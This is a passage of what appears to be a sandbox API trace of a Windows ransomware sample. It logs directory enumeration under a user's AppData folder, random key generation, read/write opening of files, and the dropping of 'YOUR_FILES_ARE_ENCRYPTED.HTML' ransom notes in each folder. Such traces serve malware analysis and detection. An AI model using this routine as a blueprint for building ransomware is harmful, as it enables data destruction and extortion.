1 [0111.051] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a184b86, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x3a184b86, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a4e76b4, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x3c0dc, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="FRMCACHE.DAT", cAlternateFileName="")) returned 1 [0111.051] StrStrIW (lpFirst="FRMCACHE.DAT", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.051] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\FORMS\\FRMCACHE.DAT") returned 68 [0111.051] PathFindExtensionW (pszPath="FRMCACHE.DAT") returned=".DAT" [0111.051] lstrlenW (lpString=".DAT") returned 4 [0111.051] PathFindExtensionW (pszPath="FRMCACHE.DAT") returned=".DAT" [0111.051] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a184b86, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x3a184b86, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a4e76b4, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x3c0dc, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="FRMCACHE.DAT", cAlternateFileName="")) returned 0 [0111.051] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0111.051] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\FORMS\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0111.051] GetProcessHeap () returned 0x600000 [0111.051] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0111.051] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\FORMS\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\forms\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0111.052] WriteFile (in: hFile=0x320, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0111.055] CloseHandle (hObject=0x320) returned 1 [0111.056] GetProcessHeap () returned 0x600000 [0111.056] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0111.056] GetProcessHeap () returned 0x600000 [0111.056] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0111.056] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x809248a1, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0xc7db342, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xc7db342, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="GameDVR", cAlternateFileName="")) returned 1 [0111.056] StrStrIW (lpFirst="GameDVR", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.056] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\GameDVR") returned 57 [0111.056] GetProcessHeap () returned 0x600000 [0111.056] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0111.057] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\GameDVR" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\GameDVR") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\GameDVR" [0111.057] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\GameDVR", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\GameDVR\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\GameDVR\\*" [0111.057] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\GameDVR\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x809248a1, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0xc7db342, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xc7db342, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x626778 [0111.057] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x809248a1, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0xc7db342, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xc7db342, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0111.058] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7db342, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xc7db342, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x212d1b5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd23c, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="KnownGameList.bin", cAlternateFileName="KNOWNG~1.BIN")) returned 1 [0111.058] StrStrIW (lpFirst="KnownGameList.bin", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.058] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\GameDVR\\KnownGameList.bin") returned 75 [0111.058] PathFindExtensionW (pszPath="KnownGameList.bin") returned=".bin" [0111.058] lstrlenW (lpString=".bin") returned 4 [0111.058] PathFindExtensionW (pszPath="KnownGameList.bin") returned=".bin" [0111.058] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0111.058] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\GameDVR\\KnownGameList.bin" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\gamedvr\\knowngamelist.bin"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0111.058] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7db342, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xc7db342, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x212d1b5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd23c, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="KnownGameList.bin", cAlternateFileName="KNOWNG~1.BIN")) returned 0 [0111.058] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0111.058] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\GameDVR\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0111.058] GetProcessHeap () returned 0x600000 [0111.058] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0111.059] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\GameDVR\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\gamedvr\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0111.060] WriteFile (in: hFile=0x320, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0111.061] CloseHandle (hObject=0x320) returned 1 [0111.062] GetProcessHeap () returned 0x600000 [0111.062] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0111.062] GetProcessHeap () returned 0x600000 [0111.062] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0111.062] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3cefc6a2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6ec87d0d, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="InputPersonalization", cAlternateFileName="INPUTP~1")) returned 1 [0111.062] StrStrIW (lpFirst="InputPersonalization", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.062] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InputPersonalization") returned 70 [0111.062] GetProcessHeap () returned 0x600000 [0111.062] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0111.063] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InputPersonalization" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InputPersonalization") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InputPersonalization" [0111.063] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InputPersonalization", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InputPersonalization\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InputPersonalization\\*" [0111.063] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InputPersonalization\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3cefc6a2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6ec87d0d, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0111.064] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3cefc6a2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6ec87d0d, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0111.064] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3cefc6a2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6ec87d0d, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TrainedDataStore", cAlternateFileName="TRAINE~1")) returned 1 [0111.064] StrStrIW (lpFirst="TrainedDataStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.064] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore") returned 87 [0111.064] GetProcessHeap () returned 0x600000 [0111.064] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0111.065] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore" [0111.065] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\*" [0111.065] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3cefc6a2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6ec87d0d, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631216, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626978 [0111.065] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3cefc6a2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6ec87d0d, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631216, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0111.065] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3cefc6a2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6ec87d0d, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631216, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 0 [0111.065] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0111.065] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 117 [0111.065] GetProcessHeap () returned 0x600000 [0111.065] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0111.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InputPersonalization\\TrainedDataStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\inputpersonalization\\traineddatastore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0111.066] WriteFile (in: hFile=0x32c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0111.067] CloseHandle (hObject=0x32c) returned 1 [0111.067] GetProcessHeap () returned 0x600000 [0111.067] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0111.067] GetProcessHeap () returned 0x600000 [0111.067] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0111.068] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3cefc6a2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6ec87d0d, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TrainedDataStore", cAlternateFileName="TRAINE~1")) returned 0 [0111.068] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0111.068] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InputPersonalization\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 100 [0111.068] GetProcessHeap () returned 0x600000 [0111.068] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0111.068] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InputPersonalization\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\inputpersonalization\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0111.069] WriteFile (in: hFile=0x320, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0111.069] CloseHandle (hObject=0x320) returned 1 [0111.070] GetProcessHeap () returned 0x600000 [0111.070] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0111.070] GetProcessHeap () returned 0x600000 [0111.070] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0111.071] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5b61023, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xf5b61023, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0xf5b61023, ftLastWriteTime.dwHighDateTime=0x1d7045f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="InstallAgent", cAlternateFileName="INSTAL~1")) returned 1 [0111.071] StrStrIW (lpFirst="InstallAgent", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.071] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InstallAgent") returned 62 [0111.071] GetProcessHeap () returned 0x600000 [0111.071] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0111.072] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InstallAgent" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InstallAgent") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InstallAgent" [0111.072] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InstallAgent", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InstallAgent\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InstallAgent\\*" [0111.072] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InstallAgent\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5b61023, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xf5b61023, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0xf5b61023, ftLastWriteTime.dwHighDateTime=0x1d7045f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x626778 [0111.072] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5b61023, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xf5b61023, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0xf5b61023, ftLastWriteTime.dwHighDateTime=0x1d7045f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0111.072] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5b61023, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xf5b61023, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0xf5b61023, ftLastWriteTime.dwHighDateTime=0x1d7045f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Checkpoints", cAlternateFileName="CHECKP~1")) returned 1 [0111.072] StrStrIW (lpFirst="Checkpoints", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.072] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InstallAgent\\Checkpoints") returned 74 [0111.072] GetProcessHeap () returned 0x600000 [0111.072] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0111.073] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InstallAgent\\Checkpoints" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InstallAgent\\Checkpoints") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InstallAgent\\Checkpoints" [0111.073] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InstallAgent\\Checkpoints", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InstallAgent\\Checkpoints\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InstallAgent\\Checkpoints\\*" [0111.073] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\InstallAgent\\Checkpoints\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5b61023, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xf5b61023, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0xf5b61023, ftLastWriteTime.dwHighDateTime=0x1d7045f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401a6, dwReserved1=0x640128, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0111.073] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5b61023, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xf5b61023, ftLastAccessTime.dwHighDateTime=0x1d7045f, ftLastWriteTime.dwLowDateTime=0xf5b61023, ftLastWriteTime.dwHighDateTime=0x1d7045f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6401a6, dwReserved1=0x640128, cFileName="..", cAlternateFileName="")) returned 1 [0111.073] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5b61023, ftCreationTime.dwHighDateTime=0x1d7045f, ftLastAccessTime.dwLowDateTime=0xf5b61023, 